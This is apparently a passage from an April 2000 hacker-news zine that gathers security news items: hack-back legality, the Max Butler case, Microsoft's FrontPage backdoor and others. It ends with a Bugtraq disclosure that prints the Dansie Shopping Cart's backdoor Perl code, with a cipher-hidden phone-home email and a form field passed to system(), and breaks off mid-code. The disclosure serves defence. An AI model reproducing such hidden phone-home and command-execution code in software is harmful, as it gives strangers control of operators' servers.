In September 1998, the Pentagon reacted to a browser-based denial-of-service attack by the hactivists Electronic Disruption Theater by using offensive applets to shut down the attacking browsers. Clean. Quick. Effective. But the Pentagon lawyers went ballistic within minutes.
The techies defending the Pentagon servers had broken too many laws to enumerate - including a military prime directive, "posse comitatus," which forbids the military from taking unilateral actions within the U.S. and against U.S. citizens. In addition, the techies by their actions had committed several federal felonies for which hackers have gone to jail.

The simple truth is that it is illegal to disarm your online assailant. Doing so requires that you take some offensive action - send out hostile applets, return fire with your own denial-of-service tools or anything else that will shut down the attack. The net effect is that both the attacker and the victim (who is attacking back) are breaking the law.

At first glance, it doesn't make any sense: If you can disarm a knife-wielding mugger, why can't you disarm your electronic mugger? But in the physical world, you know who is mugging you. During the physical attack there is a person with a knife, and while you may not know his name or see his face, you are 100% sure that the knife you are taking away is in the hands of a bad guy.

In the networked world, though, you cannot be sure the guy (IP address) that seems to be attacking you is really the one attacking you. For example, many of the zombie-based, distributed denial-of-service attacks that occurred in February were traced back to benign networks which were merely unwitting hosts to remote-triggered Trojans located on their servers.

Hostile perimeter defense is a really tough problem, and right now the law protects the bad guys more than the good guys. I don't have a perfect solution to this conundrum, but a few thoughts do come to mind:

* Let the industry design a set of hostile response tools that will stop an attack, but minimize harm just in case a zombie is in the middle. Then, legalize the use of these tools.

* Legalize hostile responses, and zombie computers be damned if their security is so bad that their networks can be compromised.
* Build a hardened back-channel on the Internet which will provide fast routing so that trace-back and bad-guy ID is easier, faster, and with the cooperation of the ISP community, automatic.

* Develop an Internet-based Caller ID system so that Web sites know who's there, what they're doing and can ignore all anonymous requests.

* Do nothing: Let the bad guys continue to win.

So in the spirit of the networked community, I'm asking readers to help out: What do you think is a fair and efficient way of disarming online assailants to protect your net? Be creative, let loose; write laws or design technology. And send me your ideas. Maybe together we can get something done.

@HWA

51.0 [HNN] More EZines Released
~~~~~~~~~~~~~~~~~~~~~~~~~~

April 12th
contributed by dave920

The second issue of HYPE has been released by Black Market Enterprises featuring w00w00.org. HWA Hax0r News is up to issue number 52.

BME
http://www.b-m-e.com/features.hype.w00w00.html

HWA Hax0r News
http://www.csoft.net/~hwa/HWA-hn52.txt

@HWA

51.1 [IND] HYPE - w00w00 zine
~~~~~~~~~~~~~~~~~~~~~~~~

w00w00
by dave920

So I decided it was time to release HYPE : Issue 2. I sent notice to BME Online's mailing list that I was looking for another candidate to honor for their contributions, and sure enough I was contacted by an online friend (that I've actually met in person as well): xm of geekmafia. He suggested that I take a gander at w00w00.org, a web address that I had not even heard of before. Since I didn't even recognize it, I decided that I would follow his suggestion and see what w00w00 was all about. I was welcomely surprised.

I learned that this organization was one of the largest of its type (which made me feel a bit inferior for not knowing about them before this). w00w00 is a compilation of many things, mainly focused on being a computer security forum, "where people could share technical information and become involved with some of the top people in the industry." I was immediately interested.
w00w00 is a very relaxed organization and always expanding. It grew because there was nothing like it that preceded its existence. In the words of shok, which I agree with tremendously, "w00w00 is a freedom and not a restriction."

I contacted shok with my request to have w00w00 be the cover for this issue of HYPE, and he agreed. The following is the interview that took place.

dave920: What caused w00w00 to arise as an organization?

w00w00: Well, it was not intentionally created. However, the reason that it succeeded, was the lack of technical security forums, where people could share technical information and become involved with some of the top people in the industry. w00w00 is serving as something of a Studio 54, where acceptance into the group is based on technical knowledge and not reputation. There are limitations to other forums such as Phrack, L0pht, and BugTraq. Phrack is a zine, not a forum. L0pht serves a similar purpose but has been "closed" to all but a small few. BugTraq is a moderated and fairly uninteractive email forum. w00w00 is the only one offering technical information on such a wide scale. All members have a very different background (different areas of knowledge, different countries, different languages, etc.).

What was the original focus of w00w00, and how has that changed since its foundation?

At first we tried to keep things very technical. Over time, it became relaxed and people published work when they felt like it. The group grew tremendously as a result of it. w00w00 is a loose association, in that people can continue to work where they do or affiliate with other groups. w00w00 is a freedom and not a restriction.

How do you feel that your organization has benefitted the Internet community? In the same regards, how has w00w00 benefitted from it?

We've offered a forum unparallel to any other for the security community.
We've allowed all kinds of people to get together for a common cause (very similar to a security conference, but online and available 365 days a year). Without the Internet, w00w00 wouldn't be possible, as we're entirely Internet-based.

What specific steps have you taken to further the advancement of w00w00?

We intentionally went for diversity, so that each member could grow from the others. We've always allowed bright people to get involved, and we've had key involvements with other groups and companies to increase the commonwealth of the group and share resources.

How has your understanding of the computer underground changed through the development of w00w00?

Hmm, interesting question. I would say that it allows us to see the computer security community from both a corporate (many members work for large security firms) and a security group view, that large corporations don't have access to. It's allowed us to interact with both sides. As far as how its changed our understanding, I can't say it has. What I would say is that it brought the different understandings of different members and merged them into a common one.

What would you say is the most significant accomplishment that w00w00 has made?

Growing into not only the world's largest non-profit security organization, but by far the most diverse in geographic distribution, ethnic distribution, and technical distribution.

What do you plan for the future of your organization?

Continue to share information, continue to publish or work, and continue to grow, grow, grow.

@HWA

52.0 [HNN] Max Vision Goes to Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th
contributed by lseek99

After being hit with a fifteen count indictment last month Max Vision (Max Butler) returned to court to hear the judge set the timetable for the trial.
Max Vision has been charged with interception of communications, computer intrusion and possession of stolen passwords in connection with cyber intrusions of Department of Defense computer systems in the Spring of 1998. Max had created the open source catalog of IDS signatures known as arachNIDS as well as maintained whitehats.com.

Security Focus
http://www.securityfocus.com/news/18

"White Hat" Hacker in Court

Open source hacker "Max Vision" aided the FBI while allegedly cracking the Pentagon.

By Kevin Poulsen
April 13, 2000 12:26 AM PT

A 27-year-old computer security expert and former FBI source returned to federal court in San Jose, California Wednesday, where he stands accused of penetrating a string of defense department and civilian computers.

Max Butler, known as "Max Vision" to friends and associates, was slammed with a fifteen count indictment last month charging him with interception of communications, computer intrusion and possession of stolen passwords in connection with an alleged hacking spree in the Spring of 1998.

At Wednesday's appearance, Judge James Ware set a new date of May 8th for laying down the timetable of deadlines and court appearances that lead to trial.

Butler's indictment sent shockwaves through the close-knit community of computer security experts who specialize in the arcane science of intrusion detection - the careful analysis of Internet traffic for "signatures" indicative of an attack.

Butler is noted for creating and maintaining arachNIDS, an open source catalog of attack signatures that could be thought of as a clearinghouse of clues for Internet cybersleuths, and is part of an overall public resource that Butler created at WhiteHats.com.

In the parlance of hackers, "white hats" are ethical and law abiding -- distinguishable from "black hats" who crack computers without permission, and "gray hats" who fall somewhere in between.
Martin Roesch, Director of Forensic Systems at network security startup Hiverworld, says that until last month, there was no doubt what color Butler's "hat" was. "He donated an immense amount of time to open source security, and he did a hell of a job." says Roesch. "Everyone's using arachNIDS."

'Butler has provided useful and timely information on computer crimes in the past' -- FBI affidavit

Roesch recruited Butler to join Hiverworld as Vulnerability Engineer, luring him away from the consulting work and penetration testing he performed as Max Vision Network Security. According to Hiverworld, Butler passed a background check, and was to start work on March 21st. He didn't make it.

"The day he was supposed to start he said he was unable to come in... and that he would catch up with me in a day or two," recalls Hiverworld CTO David Cruickshank. "That night, I had fallen asleep with the TV on, and I woke up when I heard his name on the news."

Known Vulnerability

Butler self-surrendered to authorities on March 21st, the day he was to begin his new job. He's charged with cracking systems at McChord Air Force Base, NASA's Marshall Space Flight Center, the Argonne and Brookhaven National Labs, IDSoftware, and an unspecified Defense Department system. Another count alleges he unlawfully possessed 477 customer passwords from Aimnet, an ISP.

He plead not-guilty, and was released on March 24th on $100,000 in signature and property bonds posted by friends in the open source community, a dozen of whom reportedly flocked to the courtroom in support of Butler.

According to an FBI affidavit dated July 2nd, 1998, executed by agent Peter Trahon of the Bureau's San Francisco Computer Crime Squad, the investigation that led to Butler began in May of that year, when the Defense Department began suffering a rash of intrusions exploiting a "recently discovered" vulnerability in a common piece of software called BIND.
The devastating security hole formally known as the "iquery BIND Buffer Overflow vulnerability" was publicly announced by Carnegie Mellon's Computer Emergency Response Team (CERT) on April 8th, 1998, by which time a new version of BIND without the bug was available. But a month later, according to the affidavit, hackers were still using it to crack Air Force systems, nuclear laboratories, the U.S. Departments of Commerce, Transportation and the Interior, as well as the National Institute of Health.

According to the statement, on May 21st, 1998 an Air Force investigator tracked an intruder from McChord Air Force Base back to a computer at Los Angeles Community College, which proved to be a staging ground for BIND buffer overflow attacks on military sites all around the country. Connection logs obtained from the college under a court order lead to a particular Internet address at an ISP, where records obtained under a second court order completed the trace to Max Butler's home telephone number.

The telephone number was familiar to the FBI.

"Max Butler is well known to the [agents] of the Computer Crime Squad," the 1998 affidavit reads. "Butler has been a confidential source... for the FBI for approximately 2 years. He has provided useful and timely information on computer crimes in the past."

The affidavit notes that their source "has the ability to develop techniques for, and commit, a sophisticated computer intrusion such as the ones described herein."

"Hacker Witch-Hunt"

The FBI searched Butler's home on July 2nd, 1998. But according to his lawyer, the raid didn't stop the Computer Crime Squad from returning to Butler for more help.

Defense attorney Jennifer Granick, says her client's cooperation with the FBI never involved informing on other people. "They used him for technological help, and then they pressured him to do more than that, and to do things he didn't want to do," says Granick.
"They continued to seek his assistance even after he became a suspect in this case." [Granick has contributed to SecurityFocus.com.] "The government then turns around in court and says he's dangerous and he's a flight risk, even though they had continued to want to work with him," says Granick, who declined to comment on other details of the case. Assistant U.S. Attorney Ross Nadel -- Butler's prosecutor and the head of Silicon Valley's "Computer Hacking and Intellectual Property" (CHIP) unit -- didn't return phone calls Wednesday. Butler is under advice from Granick not to speak to the press, and he didn't answer an email inquiry. But in an April 3rd message to an intrusion detection forum, Butler commented on what he termed the "frenzy of the hacker witch-hunt." "I am innocent until proven guilty and would appreciate the recognition of this by our community," writes Butler, who also vows to continue his work on open source security, though at a reduced capacity. "Due to my unusual circumstances, the focus of my activities will shift to more professional work and less pure research... I'll do what I can as the situation allows." Butler also railed against Hiverworld, which withdrew its employment offer after learning of his indictment. "[T]he corporation expressed cowardice that is deplorable. I can't tell you how disappointed I was to feel the complete lack of support from the Hive," wrote Butler. Hiverworld's Cruickshank says the company had no choice. "We're a security start up that does intrusion detection and vulnerability scanning, so having a person on staff who is under suspicion for major hacking incidents is probably not the best idea in the world," says Cruickshank. "As a security company," Cruickshank adds, "it's really important for us to have white hats on board." 
@HWA

53.0 [HNN] Mitnick On the Corporate Conference Circuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th
contributed by Weld Pond

Kevin Mitnick is making the rounds of the corporate conference circuit. In Salt Lake City next week he will lead a three-person panel discussion on cyber security issues. He will join Rob Clyde, vice president of security management at AXENT Technologies, Inc., and Kelly White, senior consultant with Context Integration in a discussion of cyber security issues.

PR Newswire - via Excite
http://news.excite.com/news/pr/000412/ut-uita-nettrends

Kevin Mitnick, Reformed Hacker, to Lead Cyber Security Panel at UITA's NetTrends 2000

Information Security Experts to Give Utah Businesses a Wake-up Call

Updated 3:25 PM ET April 12, 2000

MIDVALE, Utah, April 12 /PRNewswire/ -- One of the most visible computer hackers in the world will be in Salt Lake City next week to lead a three-person panel discussion on cyber security issues.

Kevin Mitnick has spent more than six of the last 20 years in jail or prison for various technology related crimes. He was most recently released from a medium-security federal prison in Lompoc, California after being incarcerated for more than four years.

Next Wednesday Mitnick will join Rob Clyde, vice president of security management at AXENT Technologies, Inc., and Kelly White, senior consultant with Context Integration, in what is expected to be a free-wheeling panel discussion on cyber security issues facing businesses and governments in Utah and around the world.

The 75-minute cyber security panel discussion will be held from 1:00 p.m. to 2:15 p.m. on Wednesday, April 19 at the Salt Palace Convention Center in Salt Lake City. The panel discussion is part of a two-day event, April 19 and 20, produced by the Utah Information Technologies Association called NetTrends 2000: The Digital Revolution.
"The Cyber Security panel will provide invaluable security information to business leaders," said Richard Nelson, president and chief executive officer of UITA. "Our panel of experts has nearly 50 years of combined experience in information security. But what makes this panel truly unique is the diversity of experience our panelists have. Rob has spent his career creating computer security systems, Kelly has studied and tested security systems and Kevin has built his expertise in circumventing these systems. Together the three will discuss the real security issues facing businesses today and the best solutions to effectively protect systems from intrusion." Mitnick is recognized by many as one of the most visible hackers in history, including breaking into computer systems at some of the world's largest corporations. As a reformed hacker, Mitnick's expert commentary has been broadcast on CBS's 60 Minutes, CNN, Fox and CourtTV. In March 2000, he testified before the United States Senate in committee hearings to explore ways to make computer systems safer from intruders. As a founder of AXENT Technologies, Robert Clyde was a primary developer of AXENT's original security management products and launched its security consulting services. (AXENT is a provider of enterprise security solutions for distributed computer environments.) Clyde has more than 20 years of experience in security product development, management and consulting. He has provided security consulting to Fortune 1000 companies and financial institutions, advising CIOs and IT managers on how to solve security problems at an enterprise level. Clyde is also a sought-after speaker at security-related conferences. Kelly White is a senior consultant with Context Integration, a provider of business-to-business e-commerce solutions. Prior to joining Context Integration, White was an Internet security specialist with Ernst & Young LLP. 
As a security consultant, White conducted Internet attack and penetration studies and designed Internet security architectures for Fortune 1000 companies.

NetTrends 2000, Utah's premier IT conference, is focused on providing Utah IT professionals with insights regarding today's best e-Business models, future technologies and emerging trends. NetTrends 2000 will be held April 19-20 at the Salt Palace Convention Center in Salt Lake City, Utah. NetTrends 2000 is a day and a half event running from 8:00 am to 4:00 p.m. on April 19 and from 8:00 a.m. to 11:45 a.m. on April 20. The cost is $195 for UITA members and $295 for non-members. To register online, visit www.uita.org or call Jennifer at 801-568-3500.

Utah Information Technologies Association is a non-profit organization comprised of Utah information technology professionals dedicated to providing services and events that enhance the growth of Utah's IT community, consisting of over 2500 IT enterprises, through networking, capital formation, skilled workforce development, positive media recognition, public policy advocacy and marketing opportunities. For more information about UITA or NetTrends 2000 visit www.uita.org or call 801-568-3500.

Contact: Richard Nelson of UITA, 801-568-3500, rnelson@uita.org; or David Politis, dpolitis@politis.com, or Stephanie Dullum, sdullum@politis.com, both of Politis Communications, 801-523-3730, for Utah Information Technologies Association

@HWA

54.0 [HNN] AOL Liable for Music Piracy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th

contributed by root66

A German court has ruled that AOL Germany is liable for pirate music held on its servers. The ruling stems from a case filed by Hit Box in 1998. AOL says it will appeal and that there is no technical way that it can monitor all its content all the time.
USA Today
http://www.usatoday.com/life/cyber/tech/review/crh053.htm

04/12/00- Updated 11:45 AM ET

German court: AOL liable for music piracy

MUNICH, Germany (AP) - In a ruling that could give the music industry a weapon against Internet piracy, a court said Wednesday that America Online is responsible when users swap bootleg music files on its service.

The case before a Bavarian state court in Munich originated with Hit Box Software, a German company that sued AOL Germany for copyright violation in 1998 after discovering that its digital music files were being exchanged on the online service.

An attorney for Hit Box, Stefan Ventroni, hailed the ruling as an important step toward giving musicians better protection against unauthorized use of their performances on the Internet. ''With this verdict, they can demand that such Internet pages be blocked,'' he said.

AOL Germany said it would appeal. It argued that it lacks technical means to monitor the service's huge data flow and that it had closed down the forum where music was illegally swapped after learning of it. ''Total control of all pages on our servers is technically almost impossible,'' said Alexander Adler, a spokesman for AOL Germany. ''Also, that would amount to censorship.''

At issue were three instrumental versions of pop hits, including Get Down by the Backstreet Boys, intended mainly for use as karaoke soundtracks. Hit Box said each track, which normally costs up to $15 on a CD, was downloaded for free more than 1,000 times via AOL. Hit Box demanded about $50,000 in damages, but the court put off a ruling on the size of the award.

Gema, Germany's main music licensing group, said the verdict was a signal that Internet services need to introduce technologies to protect copyrights online. ''The Internet is not a lawless space,'' spokesman Hans-Herwig Geyer said.
''Right now, the rights of creative artists are being trampled on in the Internet.''

--------------------------------------------------------------------------------

Copyright 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

@HWA

55.0 [HNN] Canadian ISP Reveals Credit Card Numbers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th

contributed by Chris

Look Communications (formerly Internet Direct) allowed a file containing personal information on over 1,000 people, including credit card numbers, to be accessible to anyone via the web. The file was in place for over five days after the company was first notified before it was removed.

Toronto Star
http://www.thestar.com/thestar/back_issues/ED20000411/news/20000411NEW03_CI-CREDIT.html

National Post
http://www.nationalpost.com/financialpost.asp?f

Star:

Credit card files turn up on the Net

Security breach at service provider

By Kerry Gillespie
Toronto Star Staff Reporter

More than 1,000 confidential records - including credit card numbers - were accessible on the Internet for at least five days because of a security breach at one of Canada's largest service providers.

A man surfing the Internet stumbled on the file and notified Look Communications, formerly Internet Direct, of their problem on April 5. The file disappeared briefly, but returned and was still there last night when The Star called. Nearly three hours later, the file was gone.

``We're shutting the whole thing down now and, frankly, I'll shut down the whole system if I have to,'' Gary Kawaguchi, a shaken senior vice-president said last night. He had no idea how the security breach occurred or why the company hadn't managed to deal with it when first notified.

``This whole thing is going to prompt us to have a third party security scan on everything we do,'' Kawaguchi said.

Look Communications has some 175,000 customers across the country.
But most of the addresses on the file were from Ontario. The man who found the file and doesn't want his name used got in touch with K. K. Campbell, a Star columnist who writes about the Internet for the Fast Forward section, after the company failed to fix the problem. ``I've been writing about this for close to 10 years and I've never seen one so close to home,'' Campbell said. It was Toronto Councillor Jack Layton's name that first jumped out at him. ``That's a bit scary to think it's that easily accessible,'' Layton said, when notified that an older credit card of his was on the list. ``I wonder how many thousands of dollars in fraudulent transactions have gone on. The company certainly owes people an explanation.'' Kawaguchi said they notified the credit card companies last night. The list contained names of people who subscribed to Ipass, a global roaming service for the Internet that allows users to pay local rates instead of long distance charges. Jacqueline Miller, a graduate student who does a lot of work abroad, applied for the service to save money. While upset that her American Express card number was out in the open, Miller wasn't surprised. When she originally tried to sign up for the Ipass service over the Internet, the screen told her it wasn't a secure Web site. ``So I did it all verbally by the phone, because I refused to use their Web site,'' she said. ``I told them at the time, but they insisted `No, it is secure.' '' Chris Davis, an Internet security specialist, said he was shocked. ``Any of those people on that list could sue that company,'' said Davis, CEO of HeXedit Network Security Inc., from his Ottawa home last night. Credit card information is supposed to be sent from the user to the company on a secure encrypted link, he said. Once it reaches the company it is un-encrypted for use but should then be destroyed. 
@HWA

56.0 [HNN] Vatis Concerned About Spoofing
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th

contributed by acopalyse

Michael Vatis, director of the FBI's National Infrastructure Protection Center, has said that spoofing makes it very difficult for law enforcement to determine where an attack originates from. Vatis proposed two possible solutions, enable civilians not bound by the fourth amendment to conduct investigations or to somehow defeat spoofing with better technology.

Computer Currents
http://www.currents.net/newstoday/00/04/13/news4.html

@HWA

57.0 [HNN] L0pht Releases CRYPTOCard Vulnerabilities
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th

contributed by Silicosis

L0pht Labs at @Stake has released an advisory regarding the Palm Pilot implementation of CRYPTOCard, a software challenge/response user authentication system. L0pht has found that the user's PIN can be determined from the .PDB file stored on the Pilot. CRYPTOCard Corporation has already provided a list of recommendations.

L0pht Labs at @Stake
http://www.l0pht.com

Crypto Card Corporation
http://www.cryptocard.com

@HWA

58.0 [HNN] Phone Companies Announce Security Initiative
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 13th

contributed by ts

Mobile phone companies Ericsson, Nokia, and Motorola have announced a new initiative to secure online e-commerce via mobile phones by creating an open global industry framework for more secure transactions. The companies said that they would issue technical bulletins about the initiative by the end of May.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2531636,00.html?chkpt

Cell phone giants in Net security pact

The world's top three mobile phone manufacturers teamed up to develop an open, global industry framework for safer and simpler business over cell phones.
By Kirstin Ridley, Reuters
April 12, 2000 5:24 AM PT

LONDON -- The world's top three mobile phone manufacturers teamed up on Tuesday in an attempt to secure the growth of e-commerce by developing an open, global industry framework for safer and simpler business over cell phones.

Dismissing concerns that current Internet-enabled phones are unsafe, Sweden's Ericsson (Nasdaq: ERICY), Motorola (NYSE: MOT) of the United States and Finland's Nokia (NYSE: NOK) called on industry peers to jump aboard their initiative and ensure that customers can use mobile phones for trusted, electronic transactions.

"A mobile device will be the platform to bridge the virtual and physical worlds of e-business," said Matti Alahuhta, president of Nokia's mobile phones division. "Integrating security and transaction applications on a common core standard and platform will create a global mass market for mobile e-business," he added.

Encoding data sent over airwaves, establishing its authenticity, ensuring confidentiality and preventing its unauthorized modification and use is seen as vital to unleash the potential for a booming virtual business world. And the companies said the initiative is the key to ensure that growth projections are met. Ericsson forecasts there will be around 1 billion mobile telephone users and some 600 million mobile Internet subscribers worldwide by 2004.

WAP phones need WIM

Alahuhta conceded that WAP (Wireless Application Protocol) mobile phones, which allow Internet access, carry no guarantee that transactions are being made by the phone's owner. The answer lies partially in WAP security functions such as WTLS (Wireless Transport Layer Security) and WIM (Wireless Identification Module), which will act as a user ID for access to the Internet and offer the authentication for e-business that cell phone Internet transactions currently lack.
The three industry heavyweights said their initiative went further than that of Radicchio, a 36-member consortium of technology and telecom firms across Europe, the United States and Japan that has also called for more secure mobile e-commerce. Radicchio backs Finnish Sonera's technology solution, a so-called public key infrastructure (PKI)-based framework, which could be used as a global standard to ensure that any data sent is scrambled into a tough code to make it hacker-proof.

Ericsson, Motorola and Nokia also hope to help set up an industry standard for a digital signature that will provide the authentication -- ensuring the identity of users -- that is necessary for secure mobile e-commerce.

"The mobile device can be a tool for a variety of services, such as banking and trading services, credit card and payment services, loyalty/bonus services, and ID-card services," the companies said. "The aim is to offer solutions where security and payment services will be integrated as a standard into hundreds of millions of mobile devices in years to come."

The three companies said they would issue technical and other details about the initiative by the end of May on their Web sites and hope to formulate an open framework before the summer.

@HWA

59.0 [HNN] Microsoft Admits to Backdoor in Server Software
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by McIntyre

Microsoft has admitted that a secret password exists in its Internet Server software. The backdoor, brought to light by Rain Forest Puppy, could allow an intruder complete remote access to the system. Microsoft recommends that the file dvwssr.dll be deleted from Internet Server installations with Front Page extensions installed. The password has been present in the code for at least three years and Microsoft has said that it is conducting an internal investigation.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html

MS admits planting secret password

Microsoft engineers placed a password in server software that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide.

By Ted Bridis, WSJ Interactive Edition
UPDATED April 14, 2000 12:50 PM PT

Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites worldwide.

The manager of Microsoft's security-response center, Steve Lipner, acknowledged the online-security risk in an interview Thursday and described such a backdoor password as "absolutely against our policy" and a firing offense for the as-yet-unidentified employees.

The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft (Nasdaq: MSFT) urged customers to delete the computer file--called "dvwssr.dll"--containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions.

While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files, which could in turn provide a road map to such things as customer credit-card numbers, said security experts who discovered the password.

Two security experts discovered the rogue computer code -- part of which was the denigrating comment "Netscape engineers are weenies!" -- buried within the 3-year-old piece of software. It was apparently written by a Microsoft employee near the peak of the hard-fought wars between Netscape Communications Corp.
and Microsoft over their versions of Internet-browser software. Netscape later was acquired by America Online Inc.

One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy." Despite his unusual moniker, he is highly regarded by experts and helped publicize a serious flaw in Microsoft's Internet-server software last summer that put hundreds of high-profile Web sites at risk of intrusion.

Almost every Web-hosting provider

Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." "It's a serious flaw," Cooper said. "Chances are, you're going to find some major sites that still have it enabled."

Lipner of Microsoft said the company will warn the nation's largest Web-site providers directly.

In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained that the affected code threatened to "improve a hacker's experience." Experts said the risk was greatest at commercial Internet-hosting providers, which maintain hundreds or thousands of separate Web sites for different organizations.

Lipner said the problem doesn't affect Internet servers running Windows 2000 or the latest version of its server extensions included in Frontpage 2000.

The digital gaffe initially was discovered by a Europe-based employee of ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells e-commerce technology. The company declined to comment because of its coming stock sale. The other expert, Rain Forest Puppy, said he was tipped off to the code by a ClientLogic employee.

When asked about the hidden insult Thursday, Jon Mittelhauser, one of Netscape's original engineers, called it "classic engineer rivalry."
@HWA

60.0 [HNN] Backdoor Found in E-Commerce Software
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 14th

contributed by brian

Currently being used at over 200 e-commerce sites, Dansie Shopping Cart contains code that allows the author to remotely enter the system and run code on the server. The back door was discovered by Blarg Online Services which allows someone to remotely enter the server and issue commands to run CGI scripts. There has been no response from Dansie in regard to the allegations.

Internet News
http://www.internetnews.com/ec-news/article/0,2171,4_340591,00.html

Shopping Cart Program Leaves Back Door Open

By Brian McWilliams

The developer of a highly-rated ecommerce shopping cart is accused of building a software backdoor into the program that could give him or hackers complete control of the server on which it's installed.

The Dansie Shopping Cart, which is currently in use at more than 200 e-commerce sites and is recommended by several Web hosting firms, contains code that enables the author, Craig Dansie of Moreno Valley, Calif., to potentially run any command on the Web server.

"He doesn't have the right to execute commands on our server without our authorization. That is technically a hack, and he put it into his code deliberately. It's unconscionable," said Joe Harris, a technical support representative at Blarg Online Services in Seattle.

Harris discovered the hidden capability while helping a client install the Dansie Shopping Cart, a CGI script written in the Perl language, and publicized his findings earlier this week on the Bugtraq security mailing list.

According to Harris, Dansie built a subroutine into the cart which enables him to use a nine-character form element or password to remotely execute commands on the server using the broad security privileges usually assigned to CGI scripts.
But because the password is the same for every installation of the cart, and because the script must be installed with world-readable permission, anybody who has access to a server on which the cart is installed could retrieve the source code and the form element and use it to control other servers, according to Harris. "It takes little imagination to dream up the potential havoc and privacy violations this level of access could result in -- from stealing private customer records to a full-blown crack of an e-commerce server," said Harris. Dansie did not respond to repeated requests for comment. The telephone number listed in the domain record for dansie.net was disconnected sometime Thursday. And a list of several hundred customers was removed from the site Wednesday evening. Licenses for the Dansie cart start at $150 and range up to $650 for the mall version which can handle an unlimited number of merchants on the same server. According to Kasey Johns, Webmaster for Lonestar Badge and Sign of Martindale, Texas, the backdoor in the Dansie cart appears to be a means of protecting against unauthorized installations and of ensuring compliance with the software's licensing terms, which specifically prohibit modifying the source code. Johns said he learned of the backdoor in late March while trying to debug an installation problem. "I tried to make some changes to it, and basically he deleted the script right off of my server. That just doesn't seem right," said Johns. In an e-mail to Johns Wednesday, Dansie accused him of piracy and asserted that "The software has a copyright protection feature that poses NO security risk to your Web site or your Web server." But Johns said Dansie's anti-piracy efforts are over zealous. "I want the right to look at the code, make modifications, and not be locked into whatever ghosts the author has hiding in there," said Johns. 
According to Allan Knight, Webmaster for ValueWebHosting in Williamsville, New York, which has over 60 hosting clients using the cart, Dansie recently denied that the program passed information back to him. Knight, who has been using the cart for three years, said Thursday he was not aware that the script gave Dansie or others the ability to execute arbitrary commands. But Knight said he had no plans to stop using the software. "I have never had any reason to shed any distrust on Craig whatsoever," said Knight.

While Dansie could issue a patch to customers to disable the backdoor, Harris said prudent users will uninstall the software and find a new shopping cart provider. "His credibility is destroyed. Would you ever again trust anybody who did this? Imagine if it had been Microsoft," Harris said.

http://www.dansie.net/cart.html
http://www.blarg.net/
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-04-08&msg=Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net

To: BugTraq
Subject: Back Door in Commercial Shopping Cart
Date: Tue Apr 11 2000 02:24:06
Author: Joe
Message-ID:

Trojanized Commercial Shopping Cart
===============================================================

Dansie Shopping Cart
Version  : 3.04 (presumably earlier versions as well)
Author   : Craig Dansie
URL      : http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License  : Commercial, starting at $150.00
           Copyright Dec 10, 1997-2000, Dansie Website Design
Synopsis : This program -deliberately- allows arbitrary commands to be
           executed on the victim server.

One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, 'tech@dansie.net'.
This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2':

------
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
-------

The call that creates this email address and sends the mail is the function 'there3'.

-------
sub there3
{
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
      $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
      $b = &there2('8v59_3jhhzi8');
      pop(@there2);
      pop(@there2);
      $c = &there2("@there2");
      open (TECH, "|$mailprog $a");
      print TECH "To: $a\n";
      print TECH "From: $a\n";
      print TECH "Subject: $b\n\n";
      print TECH "$path3\n";
      print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
      print TECH "$c\n";
      print TECH "$e $there\n" if ($e);
      close (TECH);
   }
}
-------

The ciphered strings, when passed through 'there2', result in:

8v59         == tech
kte3cv       == dansie
ev8          == net
8v59_3jhhzi8 == tech-support

$a == tech@dansie.net
$b == Subject: tech-support

This seems curious, but plausible reasons could include insuring License compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent.

While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks)

----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) ||
     ( ($FORM{'?????????'} ) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
      system("$FORM{'?????????'}");
   }
   else
   {
